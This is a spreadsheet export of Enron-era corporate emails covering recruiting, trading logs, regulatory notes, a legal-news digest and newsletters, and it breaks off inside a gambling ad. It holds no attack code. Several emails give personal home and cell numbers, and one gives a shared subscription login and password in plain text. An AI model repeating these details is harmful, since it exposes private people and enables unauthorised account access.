Enron and has asked me a few times to get her a contact here.  I have not _x000D_
worked directly with her but due to her close proximity to my office I talked _x000D_
to her a number of times and was very impressed. (713 356 4000 - general PwC _x000D_
number)._x000D_
_x000D_
Ellen Robertson - She is an administrative assistant who is looking to leave _x000D_
PwC.   I have never worked with her, but she did come to ask me my opinion on _x000D_
how she should go about finding other work. (713 356 4000 PwC general line)._x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 01:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mstjohn@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>Re: Fall Schedule</t>
  </si>
  <si>
    <t>This schedule is correct.</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 07:25:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>Org chart</t>
  </si>
  <si>
    <t>Casually let Kim know that Phillip Allen no longer is in charge of the west.  No big deal, I just heard her tell the SMUD guys that Phillip runs the desk, etc._x000D_
_x000D_
Grigs</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 11:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'d.eastlake@mail.utexas.edu'})</t>
  </si>
  <si>
    <t>Enron Offer</t>
  </si>
  <si>
    <t>I am sure that you are enjoying your break from school.  It is always great _x000D_
to have finals behind you and several weeks of vacation stretching in front _x000D_
of you. _x000D_
_x000D_
No doubt you are spending time thinking about your next step after _x000D_
graduation.  I would be glad to answer any questions that you may have about _x000D_
your offer while you are going through that process.  Enron had a fantastic _x000D_
year in 2000, and we are excited about what we will accomplish in 2001.  We _x000D_
hope that you will be a part of that. _x000D_
_x000D_
My number at work is 713-853-5926.  Please feel free to call me any time.  If _x000D_
it is more convenient for you to talk during the evening or on the weekend, _x000D_
my home number is 281-370-8568.  Don't hesitate to call.  _x000D_
_x000D_
Sally Beck _x000D_
sally.beck@enron.com</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 00:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New Executive Viewer Report</t>
  </si>
  <si>
    <t xml:space="preserve">Vern,_x000D_
_x000D_
I spoke with Annemieke and she said that you would be the person to contact _x000D_
about adding a report to the executive viewer.  We need to add a gas report.  _x000D_
The title of the Report will be Natural Gas Basis by Trader.  I am attaching _x000D_
a copy of the report that will be published.  Please let me know if you need _x000D_
any additional information.  _x000D_
_x000D_
Thank you for your help,_x000D_
Robin_x000D_
x57478_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 19:56:25 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/10/02; HourAhead hour: 22;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 06:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Steve,_x000D_
_x000D_
I am a lead recruiter at the University of California at Berkeley for_x000D_
Enron Analyst/Associate program._x000D_
_x000D_
I contacted several friends who work at Berkeley and received an invitation_x000D_
from one of them to make a presentation at the weekly Faculty Seminar_x000D_
of the Dept. of Industrial Engineering and Operations Research._x000D_
_x000D_
The students and faculty members from the business school will be also _x000D_
invited._x000D_
_x000D_
Berkeley in general, and Department of Industrial Engineering and Operations _x000D_
Research in_x000D_
particular, are important centers of academic research on electricity markets_x000D_
(S. Oren works very closely with Severin Borenstein)._x000D_
_x000D_
My presentation will focus on the Analyst/Associate program. I shall  also _x000D_
have_x000D_
an opportunity to discuss the power markets in California (I expect many_x000D_
questions) before many experts who are very  important to shaping_x000D_
public opinion and regulatory agenda._x000D_
_x000D_
Please, let me know who in you group could help me in preparing this _x000D_
presentation_x000D_
and in presenting  Enron's point of view in a more effective way._x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
FYI. The name of my friend who invited me:_x000D_
_x000D_
Shmuel S. Oren, Professor_x000D_
Dept. of Industrial Engineering_x000D_
and Operations Research_x000D_
4117 Etcheverry Hall_x000D_
University of California_x000D_
Berkeley, CA 94720-1777</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 05:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Peru</t>
  </si>
  <si>
    <t xml:space="preserve">Mark;_x000D_
_x000D_
We were extremely pleased to have had the opportunity to work with the _x000D_
Rossell? law firm in Lima, Peru, especially while studying the possibility to _x000D_
bid for the Camisea Project.  They are excellent lawyers with local &amp; int'l _x000D_
experience, very responsive and well connected with governmental authorities._x000D_
_x000D_
Rgds,_x000D_
_x000D_
Sami_x000D_
_x000D_
---------------------- Forwarded by Sami Arap/SA/Enron on 05/02/2001 12:35 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Miguel Ronceros" &lt;mronceros@rossellolaw.com&gt; on 05/02/2001 12:18:11 PM_x000D_
To: &lt;Sami.Arap@enron.com&gt;, "Luiz Watanabe" &lt;Luiz.Watanabe@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Regards_x000D_
_x000D_
_x000D_
_x000D_
Hey guys, I have just noticed that "Enron Metals  and Commodities" has opened _x000D_
an office in the same building where we are  located.? If you know of any _x000D_
person I may contact to intend an approach, I would really appreciate it._x000D_
_x000D_
Regards,_x000D_
?_x000D_
Miguel A. Ronceros_x000D_
Estudio Rossell?_x000D_
Tel.  (511) 222-7700_x000D_
Fax. (511) 222-2555_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 07:08:40 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'clement.abrams@enron.com', 'rita.bahner@enron.com', 'david.nutt@enron.com', 'c..williams@enron.com', 'bret.reich@enron.com', 'robert.vote@enron.com', 'k..bargainer@enron.com', 'jan.cooley@enron.com', 'bonnie.white@enron.com', 'james.derrick@enron.com', 'jordan.mintz@enron.com', 'jim.armogida@enron.com', 'r..rogers@enron.com', 'drew.fossum@enron.com', 'rex.rogers@enron.com', 'h..chin@enron.com', 'sharon.butcher@enron.com', 'kriste.sullivan@enron.com', 'rob.walls@enron.com'})</t>
  </si>
  <si>
    <t>FW: Nov. 27 -- U.S. Law Week's Legal News</t>
  </si>
  <si>
    <t>User iD:  enronuslw_x000D_
PW:        bnaweb22_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"BNA Highlights" &lt;bhighlig@bna.com&gt;@ENRON  _x000D_
Sent:	Monday, November 26, 2001 11:32 PM_x000D_
To:	BNA Highlights_x000D_
Subject:	Nov. 27 -- U.S. Law Week's Legal News_x000D_
_x000D_
_______________________________x000D_
_x000D_
THE U.S. LAW WEEK'S LEGAL NEWS_x000D_
Highlights &amp; Table of Contents_x000D_
November 27, 2001_x000D_
_______________________________x000D_
_x000D_
ISSN 1522-4317_x000D_
_x000D_
Registered Web subscribers can access the full text of these_x000D_
articles by using the URL link supplied._x000D_
_x000D_
Information about becoming a subscriber or signing up for a_x000D_
FREE Web trial is available at http://web.bna.com or call_x000D_
BNA Customer Relations at 1-800-372-1033, Mon. - Fri. 8:30_x000D_
am - 7:00 pm (ET)._x000D_
___________x000D_
_x000D_
HIGHLIGHTS_x000D_
___________x000D_
_x000D_
_x000D_
THIRD CIRCUIT TASK FORCE URGES ONLY LIMITED USE OF AUCTIONS_x000D_
TO PICK CLASS COUNSEL; JUDGES CRITICAL OF REPORT'S_x000D_
NEGATIVITY_x000D_
_x000D_
Judicially controlled auctions for the selection of counsel_x000D_
in class actions should be used only in "certain limited_x000D_
circumstances," according to a draft report issued by the_x000D_
Third Circuit Task Force on Selection of Class Counsel. An_x000D_
auction might be appropriate for a case in which the_x000D_
defendant's liability appears clear, damages appear to be_x000D_
both very large and collectible, and the lead plaintiff is_x000D_
not a sophisticated litigant that has already retained_x000D_
counsel of its choice through a reasonable, arm's-length_x000D_
process, the task force suggests._x000D_
_x000D_
Several judges criticize the report as being too hostile_x000D_
toward the innovative idea of competitive bidding for_x000D_
selecting class counsel. The judges, participating in a_x000D_
panel discussion at the 2001 Third Circuit Judicial_x000D_
Conference, say the report is "too restrictive." For_x000D_
instance, the task force should encourage more_x000D_
experimentation with the process of setting fees at the_x000D_
outset of litigation rather than waiting until the end, one_x000D_
judge suggests. But others, who agree with the tenor of the_x000D_
report, say bidding is overrated as a means of keeping_x000D_
counsel fees reasonable. . . . Page s 2326,  . . . Page 2318_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y4v7f3__x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y5h8x8__x000D_
_x000D_
_x000D_
NEW YORK BAR PROPOSES AMENDING ABA MODEL RULES TO ALLOW_x000D_
CAREFULLY REGULATED MULTIDISCIPLINARY ALLIANCES_x000D_
_x000D_
The New York State Bar Association files a proposal with the_x000D_
American Bar Association recommending amendment of the Model_x000D_
Rules of Professional Conduct to allow limited and carefully_x000D_
regulated "contractual relationships" and other affiliations_x000D_
between lawyers and nonlawyers who want to offer their_x000D_
clients integrated multidisciplinary services._x000D_
_x000D_
Foremost among the safeguards being advocated by the New_x000D_
York bar are measures that would prohibit nonlawyers from_x000D_
holding any ownership or managerial interest in law firms;_x000D_
sharing legal fees with lawyers; directing or regulating the_x000D_
professional judgment of lawyers; or compromising in any_x000D_
other way a lawyer's duty to safeguard client interests. The_x000D_
proposal is patterned on recent amendments to the New York_x000D_
Code of Professional Responsibility allowing such_x000D_
affiliations. . . . Page 2315_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y7t2u6__x000D_
_x000D_
_x000D_
INS ADOPTS INTERIM PROCEDURES FOR ADJUDICATING CASES OF_x000D_
UNREMOVABLE ALIENS SEEKING RELEASE FROM DETENTION_x000D_
_x000D_
The Immigration and Naturalization Service issues an interim_x000D_
rule governing detention of aliens who are subject to final_x000D_
orders of removal but cannot likely be removed in the_x000D_
foreseeable future because no country will accept them. The_x000D_
rule responds to the U.S. Supreme Court's recent "Zadvydas"_x000D_
decision, which held that, absent special circumstances, the_x000D_
attorney general lacks authority to detain such aliens_x000D_
indefinitely._x000D_
_x000D_
The rule specifies procedures for aliens who have been_x000D_
detained beyond the statutory 90-day removal period to_x000D_
demonstrate that their removal is unlikely in the reasonably_x000D_
foreseeable future. Aliens seeking relief must make a_x000D_
threshold showing that they have cooperated with the INS's_x000D_
efforts to effect their removal. Aliens who prevail on such_x000D_
claims must be released, subject to conditions of_x000D_
supervision, unless "special circumstances" would render_x000D_
release dangerous. . . . Page 2321_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y5e1v0__x000D_
_x000D_
_x000D_
______________x000D_
_x000D_
IN THIS ISSUE_x000D_
______________x000D_
_x000D_
A complete topical index of Legal News._x000D_
_x000D_
ATTORNEYS: The ABA ethic's committee says it is not_x000D_
unethical for a former in-house corporate counsel to pursue_x000D_
a wrongful discharge action against her ex-employer so long_x000D_
as the lawyer does not reveal more client information than_x000D_
reasonably necessary to establish the claim. . . . Page 2315_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4x5z9h9__x000D_
_x000D_
ATTORNEYS: The New York bar proposes amending the ABA Model_x000D_
Rules to allow regulated multidisciplinary alliances. . . ._x000D_
Page 2315_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y7t2u6__x000D_
_x000D_
BANKING: The Treasury Department issues interim guidelines_x000D_
to help financial institutions comply with provisions of the_x000D_
new money laundering law relating to correspondent bank_x000D_
accounts that take effect next month. . . . Page 2317_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y7t2j0__x000D_
_x000D_
BANKRUPTCY: Congress may, separately from long-pending_x000D_
comprehensive bankruptcy reform legislation, address banks'_x000D_
use of financial derivatives, as well the possible permanent_x000D_
extension of Chapter 12 of the Bankruptcy Code. . . . Page_x000D_
2317_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y7t2f5__x000D_
_x000D_
CIVIL PROCEDURE: The Third Circuit Task Force on Selection_x000D_
of Class Counsel issues a draft report suggesting only_x000D_
limited use of auctions to pick class counsel. . . . Page_x000D_
2326_x000D_
_x000D_
But several judges say the report reflects an overly adverse_x000D_
view of competitive bidding as a selection tool. . . . Page_x000D_
2318_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y4v7f3__x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y5h8x8__x000D_
_x000D_
EMPLOYEE BENEFITS: The House passes legislation to allow_x000D_
financial institutions that administer qualified_x000D_
employer-sponsored defined contribution retirement plans to_x000D_
provide investment advice to plan participants without_x000D_
employers being liable for specific advice. . . . Page 2319_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y4u2y5__x000D_
_x000D_
EMPLOYMENT DISCRIMINATION: The Equal Employment Opportunity_x000D_
Commission advises its district directors to continue_x000D_
processing and investigating disability discrimination_x000D_
charges against state government employers, despite a U.S._x000D_
Supreme Court ruling that individuals can no longer sue_x000D_
those employers for monetary relief under the Americans with_x000D_
Disabilities Act. . . . Page 2320_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y6r9m0__x000D_
_x000D_
IMMIGRATION: The Immigration and Naturalization Service_x000D_
issues an interim rule establishing procedures for_x000D_
adjudicating the release of aliens who are subject to final_x000D_
orders of removal but cannot likely be removed in the_x000D_
foreseeable future because no country will accept them. . ._x000D_
. Page 2321_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y5e1v0__x000D_
_x000D_
JUDGES: Legal professionals attending a national symposium_x000D_
on the reform of judicial elections say the election process_x000D_
is becoming "nastier, noisier and costlier," but that the_x000D_
options for reforming the election process carry their own_x000D_
problems and may not even be constitutional. . . . Page 2322_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y3d6a0__x000D_
_x000D_
OCCUPATIONAL SAFETY: The Occupational Safety and Health_x000D_
Administration reaches an agreement with the National_x000D_
Association of Manufacturers that will settle NAM's lawsuit_x000D_
over the safety agency's revised recordkeeping rule. Under_x000D_
the agreement, OSHA, during the first 120 days the_x000D_
regulation is in effect, will refrain from enforcing the_x000D_
regulation and instead focus on compliance assistance. . . ._x000D_
Page 2323_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y6q2f4__x000D_
_x000D_
OCCUPATIONAL SAFETY: The Department of Labor issues_x000D_
guidelines for employers to use when responding to anthrax_x000D_
exposure. The guidance document, which creates no new_x000D_
requirements, is intended to help employers determine_x000D_
appropriate equipment and work practices. . . . Page 2323_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y5t1w7__x000D_
_x000D_
SECURITIES: An American Bar Association task force will_x000D_
submit to the Securities and Exchange Commission a letter_x000D_
recommending significant changes to the controversial_x000D_
Regulation FD, the fair disclosure rule requiring public_x000D_
companies, in disclosing material information, to announce_x000D_
such information to the public at large rather than to_x000D_
select groups, such as analysts. . . . Page 2324_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y7a7k7__x000D_
_x000D_
TAXATION: The Senate votes to extend the Internet tax_x000D_
moratorium by two years, but declines to address online_x000D_
sales tax concerns, leaving it up to the states to develop a_x000D_
more streamlined system for the collection and distribution_x000D_
of sales and uses taxes stemming from online sales. The_x000D_
legislation, already approved by the House, will almost_x000D_
certainly be signed by the president. . . . Page 2324_x000D_
_x000D_
http://pubs.bna.com/ip/BNA/law2.nsf/id/a0a4y7a7p8__x000D_
_x000D_
_x000D_
____________________________________________________________x000D_
The U.S. Law Week (ISSN 1522-4317) BNA's Highlights are_x000D_
published weekly by The Bureau of National Affairs, Inc.,_x000D_
1231 25th St., N.W., Washington, DC 20037.  For Customer_x000D_
Service including subscriptions and address changes, call_x000D_
1-800-372-1033.  For retransmission of the Highlights, more_x000D_
information or to order full text of summarized stories,_x000D_
call BNA PLUS at 1-800-452-7773 (202-452-4323 in DC), FAX #_x000D_
202-822-8092, Internet:bnaplus@bna.com._x000D_
_x000D_
Copyright (c) 2001 by The Bureau of National Affairs, Inc._x000D_
Washington, D.C.  20037.  Use of this service is subject to_x000D_
the terms and conditions of the license agreement with BNA._x000D_
Unauthorized access or distribution is prohibited.</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2000 03:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>True Orange Fax/E-Mail 98</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by David M Gagliardi/TTG/HouInd on_x000D_
10/19/2000 10:26 AM ---------------------------_x000D_
_x000D_
_x000D_
mggagliardi@duke-energy.com on 10/17/2000 07:18:07 AM_x000D_
_x000D_
To:   Tony.A.Rogers@fritolay.com, David_Ricks@GSDM.com,_x000D_
DGagliardi@reliantenergy.com_x000D_
cc:_x000D_
_x000D_
Subject:  True Orange Fax/E-Mail 98_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Michael_x000D_
Gagliardi/Hou-ComOps/EnergyTrading/PEC on 10/17/2000 07:27 AM_x000D_
---------------------------_x000D_
_x000D_
_x000D_
TruOrange@aol.com on 10/16/2000 04:37:28 PM_x000D_
_x000D_
To:   TruOrange@aol.com_x000D_
cc:_x000D_
Subject:  True Orange Fax/E-Mail 98_x000D_
_x000D_
_x000D_
True Orange Fax/E-Mail Service_x000D_
Volume 8, Fax/E-Mail #98, Monday, October 16, 2000_x000D_
Jerry Scarbrough's True Orange, P. O. Box 26530, Austin, Texas 78755 -_x000D_
Phone_x000D_
512-795-8536_x000D_
_x000D_
Missouri Game Set for 1:30, No TV; Baylor Game Gets TV at 11:30_x000D_
_x000D_
After doing some on-air promos on the Texas-Missouri game, ABC opted_x000D_
instead_x000D_
to televise the Texas A&amp;M-Iowa State game, so the Saturday game in Austin_x000D_
between Texas and Missouri will start at 1:30 p.m. and will NOT  be_x000D_
televised._x000D_
The Baylor game in Austin the following week will be televised by the Fox_x000D_
Network and will begin at 11:30 a.m._x000D_
No pay per view will be available on Texas-Missouri because ABC's contract_x000D_
with the Big 12 prohibits members of the Big 12 from televising a game in_x000D_
the_x000D_
same time frame with the ABC network game. Texas set the time at 1:30 p.m.,_x000D_
which would conflict with the telecast of the A&amp;M-Iowa State game._x000D_
The next road game is at Texas Tech on Nov. 4, and it should be televised,_x000D_
but we won't know for sure until next Monday (the infamous 12-day window_x000D_
the_x000D_
networks require)._x000D_
* * * *_x000D_
Coach Mack Brown said Monday he thinks the Longhorns will fare better now_x000D_
that the coaches have simplified the offense and settled on a starting_x000D_
quarterback._x000D_
"When I was at North Carolina and used two quarterbacks, we had more_x000D_
experienced people around them," he said. "I think we just need to simplify_x000D_
as much as we can and just let them play."_x000D_
He said that was the game plan at Colorado and he said that is the way the_x000D_
coaches will prepare the team for the Missouri game._x000D_
Brown said he also thinks the two-back offense is better for Texas for_x000D_
several reasons. He said having two backs behind the quarterback improves_x000D_
the_x000D_
pass protection. When teams rush eight defenders, he  said the five_x000D_
linemen,_x000D_
the tight end and one running back have one more rusher than there are_x000D_
blockers. When two backs are there, he said there are enough people to_x000D_
block_x000D_
everyone, even in a maximum blitz. Oklahoma kept two backs in early against_x000D_
Texas to protect Josh Heupel from the Texas rush. It obviously worked_x000D_
pretty_x000D_
well for the Sooners, and it worked for the Longhorns Saturday in Boulder._x000D_
It also is a better power-running formation because of the extra blocker,_x000D_
he_x000D_
said, adding that success in the running game causes the other team's_x000D_
safeties to creep up to help stop the run. He said that causes "one-on-one_x000D_
coverage on the wide receivers and also lets the tight end slip out_x000D_
easier."_x000D_
He said the Longhorns' running success at Colorado was a major reason for_x000D_
all_x000D_
the long completions to wide receivers and to TE Mike Jones having such_x000D_
success._x000D_
"When you can run and pass, it creates some problems for the defense," he_x000D_
said. "We plan to keep working on being able to do both."_x000D_
True freshman WR B. J. Johnson went along with the simplification idea,_x000D_
while_x000D_
having some fun with the rerporters on hand. Johnson said when he first got_x000D_
to Texas and "heard the coaches talking about cover 6 . . . I didn't even_x000D_
know they had six coverages._x000D_
When someone asked him if he knew all the defensive coverages now, he said,_x000D_
"I don't even know all the plays, to tell you to truth. You should see our_x000D_
playbook."_x000D_
He was asked if life was simpler back when he first starting playing_x000D_
football. "In pee-wee ball, we might have had 10 plays, and they all_x000D_
worked,"_x000D_
he said. Everybody, including B. J., laughed._x000D_
* * * *_x000D_
BASKETBALL RECRUITING: T. J. Ford, the 5-11, 160-pound point guard at_x000D_
defending state 5A champion Fort Bend Willowridge, has made his college_x000D_
choice, but he won't reveal it until a  5:45 p.m. Wednesday press_x000D_
conference_x000D_
at Harlem Elementary School in Baytown. The Longhorns have a great shot,_x000D_
but_x000D_
he also has taken visits to Louisville, Memphis State and Houston and could_x000D_
wind up picking one of them. The Longhorns have only two scholarships to_x000D_
award this year and Chris Wright, a  6-10 center at Redwater, committed_x000D_
last_x000D_
year. So, if Ford comes aboard, the Longhorns would sign Wright and Ford on_x000D_
November  8, the first day of the early signing period, and that would wrap_x000D_
up their class._x000D_
* * * *_x000D_
My next e-mail/fax will be whenever events warrant and no later than_x000D_
Wednesday, October 18._x000D_
* * * *_x000D_
The True Orange Fax Service includes  at  least  99 faxes  a year and costs_x000D_
$99 ($79 by E-Mail). The True Orange Newsletter includes  26 newsletters_x000D_
and_x000D_
is published weekly during football season and twice monthly during most of_x000D_
the other months. It costs $45. Save by subscribing to both for $130 (or_x000D_
$110_x000D_
if you take the faxes via E-Mail  or $99 if you take the faxes and_x000D_
newsletter_x000D_
via E-Mail). Send check  to address at the top of page. I also  update my_x000D_
900 number ? 1-900-288-8839 ? frequently with recruiting news. My E-Mail_x000D_
address is: truorange@aol.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 Jan 2002 14:38:05 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/10/02; HourAhead hour: 17;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011017.txt</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 01:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kyle.purvis@enron.com', 'david.ayers@enron.com', 'cheryl.dawson@enron.com', 'larry.campbell@enron.com', 'butch.russell@enron.com', 'william.kendrick@enron.com', 'rick.loveless@enron.com', 'mike.riedel@enron.com', 'marilyn.june@enron.com'})</t>
  </si>
  <si>
    <t>Texas Air Issues</t>
  </si>
  <si>
    <t xml:space="preserve">Notes from TXOGA and TCC committee meetings:_x000D_
_x000D_
Operating Permits - TNRCC is attempting to obtain EPA approval of their Title _x000D_
V operating permit program by including Minor New Source Review (NSR) (e.g., _x000D_
permits by rule) in the operating permit program. The TNRCC idea is that you _x000D_
would make changes or install equipment under a permit by rule as you do now _x000D_
under current rules. When your Title V permit is renewed, all Minor NSR _x000D_
approvals would be rolled into the permit and included in the renewed permit. _x000D_
They are also putting together a General Operating Permit (GOP) that would _x000D_
include Minor NSR. It is unknown if EPA will buy this concept._x000D_
_x000D_
Upset and Maintenance - A general note: The TNRCC field offices are giving _x000D_
different answers to questions that have been asked by industry about the new _x000D_
upset and maintenance rules. _x000D_
_x000D_
When reporting upset emissions, TNRCC wants you to report all pollutants, not _x000D_
just the ones that exceeded the RQs;_x000D_
It is important to give as much detail as possible on the cause of an upset. _x000D_
"Operator error" is not acceptable to TNRCC and may make it more likely you _x000D_
will be investigated by TNRCC if you repeatedly give this as a cause since it _x000D_
may appear to the agency that this is a repeat problem that a company is not _x000D_
correcting;_x000D_
TNRCC's Region 12 (Houston Area) is conducting inspections at 20 facilities _x000D_
specifically directed at upset notifications. The inspections take about two _x000D_
days. Companies are inspected if they make too many upset notifications or _x000D_
too few._x000D_
When reporting a release of natural gas (unspeciated), you should exclude _x000D_
methane and ethane from the reporting and calculation of determining the _x000D_
5,000 pound threshold, but according to TNRCC you cannot exclude CO2 or N2;_x000D_
If you do speciate a release, remember that heptane and nonane are not listed _x000D_
pollutants so they default to a 100 pound RQ._x000D_
_x000D_
New Source Review - TNRCC has lifted their hold on NSR permits in the Houston _x000D_
non-attainment area, but if there are too many permit applications between _x000D_
now and December 6 (to beat the new non-attainment regulations that should _x000D_
pass on December 6) there is a chance that they will put another hold on _x000D_
permits._x000D_
_x000D_
EPA Enforcement Priorities - EPA has proposed their enforcement priorities _x000D_
for Fiscal Year 2002-3 and they include "fuels management". Fuels management _x000D_
is broadly defined to include many industries and includes pipelines. It is _x000D_
not believed that this directive is aimed at gas pipelines, but it is broad _x000D_
enough to include them._x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 09:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Latest Drafts and Phone Numbers</t>
  </si>
  <si>
    <t xml:space="preserve">Scott Number:_x000D_
Home 281 345 6064_x000D_
Pager 888 397 3992_x000D_
Cell      713 806 2667_x000D_
_x000D_
Gordon Savage Number_x000D_
Home 713 465 8394_x000D_
Pager 877 638 3866_x000D_
Cell 323 363 2913_x000D_
_x000D_
Roger Yang:_x000D_
Pager: 888 467 6218_x000D_
_x000D_
_x000D_
From: Jeff Dasovich@ENRON on 12/22/2000 05:02 PM_x000D_
Sent by: Jeff Dasovich@ENRON_x000D_
To: MDay@GMSSR.com, Scott Stoness/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 02:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sharon_marino@eott.com'})</t>
  </si>
  <si>
    <t>Re: JUST A REMINDER!</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, Sharon!   Stan Horton is currently planning to attend this event._x000D_
_x000D_
Cindy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sharon_Marino@eott.com on 11/28/2000 09:37:30 AM_x000D_
To: Houston_Employees%EOTT@eott.com_x000D_
cc:  _x000D_
_x000D_
Subject: JUST A REMINDER!_x000D_
_x000D_
_x000D_
TO ALL HOUSTON EMPLOYEES:  COUNTDOWN TO THE HOLIDAY CELEBRATION IS ON!!!_x000D_
AS IT IS APPROACHING QUICKLY, WE WOULD APPRECIATE YOUR RSVPs (VIA EMAIL, IF_x000D_
YOU WISH) AT YOUR EARLIEST CONVENIENCE SO THAT WE MAY PROVIDE OUR CATERERS_x000D_
AN ACCURATE HEAD COUNT ASAP._x000D_
_x000D_
THANKS!_x000D_
SHARON_x000D_
_x000D_
                            Holiday_x000D_
 Celebration!_x000D_
_x000D_
              You are cordially invited to attend_x000D_
_x000D_
               EOTT's Annual Holiday Celebration_x000D_
_x000D_
                          to be held_x000D_
_x000D_
         Friday, December 8, 2000  - 11:30 AM- 2:30 PM_x000D_
_x000D_
           on the 20th Floor of  - Briar Lake Plaza_x000D_
_x000D_
                   FOOD! GAMES! PRIZES! FUN!_x000D_
_x000D_
    RSVP:   Sharon Marino  - X5002 -OR email no later than_x000D_
                            12/4/00_x000D_
_x000D_
_x000D_
  NOTE:  For those of you on alternate work schedules, (9/80_x000D_
                          and 4 1/2),_x000D_
        you are requested to work on 12/8/00, and take_x000D_
 an alternate day off during the same week.  Please coordinate_x000D_
                      this alternate time_x000D_
   off with your supervisor to ensure adequate coverage for_x000D_
                        business needs._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sharon Marino_x000D_
Executive Assistant_x000D_
EOTT HR/Administration_x000D_
713 993 5002_x000D_
sharon.marino@eott.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 18:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Win $2500!</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
ODDS?|?PICKS?|?FANTASY=20_x000D_
[IMAGE]_x000D_
=09?? You are here: Home ?&gt; Win $2500  Weekly!=20_x000D_
_x000D_
_x000D_
_x000D_
Pro Football | College Football | Pro Basketball | Coll Basketball| Horse=_x000D_
=20_x000D_
Racing| Hockey | More=20_x000D_
=09[IMAGE]_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
?=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09MORE  COVERAGE_x000D_
=09_x000D_
=09_x000D_
=09Gold Sheet_x000D_
=09Fantasy News_x000D_
=09Contest News_x000D_
=09'Moneymaker'_x000D_
=09Trushel Sports_x000D_
=09Crow Sports_x000D_
=09More Sports_x000D_
=09Euro  Sports_x000D_
=09Radio_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09HANDICAPPING  TOOLS_x000D_
=09_x000D_
=09_x000D_
=09Live Odds_x000D_
=09Free updated odds_x000D_
=09Offshore odds_x000D_
=09Overnight Line_x000D_
=09Futures_x000D_
=09Chat_x000D_
=09Injuries_x000D_
=09Sports Calendar_x000D_
=09Prop House=20_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
_x000D_
=09=09=09_x000D_
=09=09=09_x000D_
=09=09=09?  NEED HELP WITH YOUR PICKS??_? Free  odds ? Expert  picks ? Free=_x000D_
  matchups=20_x000D_
=09=09=09_x000D_
?=09?_x000D_
=09Win $2500!_x000D_
=09_x000D_
=09_x000D_
=09_x000D_
=09Win $2500 weekly in Beat The Spread._x000D_
=09?_x000D_
=09Win  $2500 weekly in Beat The Spread._x000D_
